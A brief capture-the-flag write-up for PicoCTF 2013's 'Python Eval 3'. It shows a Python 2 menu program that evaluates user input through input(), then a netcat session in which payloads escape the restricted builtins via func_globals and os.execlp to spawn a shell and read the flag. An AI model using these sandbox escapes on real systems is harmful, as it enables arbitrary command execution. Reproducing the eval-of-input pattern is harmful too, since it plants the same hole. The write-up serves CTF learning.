# PicoCTF 2k13 - Python Eval 3


$ cat task3.py
#!/usr/bin/python -u
# task3.py
# Remember kids: this is bad code. Try not code like this :P

from os import path
del __builtins__.__dict__['__import__']
del __builtins__.__dict__['reload']

print "Welcome to the food menu!"
choices = (
  ("Chicken Asada Burrito", 7.69, "caburrito.txt"),
  ("Beef Chow Mein", 6.69, "beefchow.txt"),
  ("MeatBurger Deluxe", 10.49, "no description"),
  # ...
)

def print_description(n):
  print ""
  if n >= len(choices):
    print "No such item!"
  elif not path.exists(choices[n][2]):
    print "No description yet, but we promise it's tasty!"
  else:
    print open(choices[n][2]).read()

def show_menu():
  for i in xrange(len(choices)):
    print "[% 2d] $% 3.2f %s" % (i, choices[i][1], choices[i][0])

while True:
  print "Which description do you want to read?"
  show_menu()
  print_description(input('> '))
$ nc python.picoctf.com 6363
Welcome to the food menu!
Which description do you want to read?
[ 0] $ 7.69 Chicken Asada Burrito
[ 1] $ 6.69 Beef Chow Mein
[ 2] $ 10.49 MeatBurger Deluxe
> path.warnings.catch_warnings.__init__.func_globals['linecache'].__dict__['os'].system('/bin/sh')
> path.os.execlp('sh','')
id
uid=1004(py3) gid=1005(py3) groups=1005(py3)
ls
run.sh
task3.py
your_flag_here
cat your_flag_here
eval_is_super_OSsome

No comments: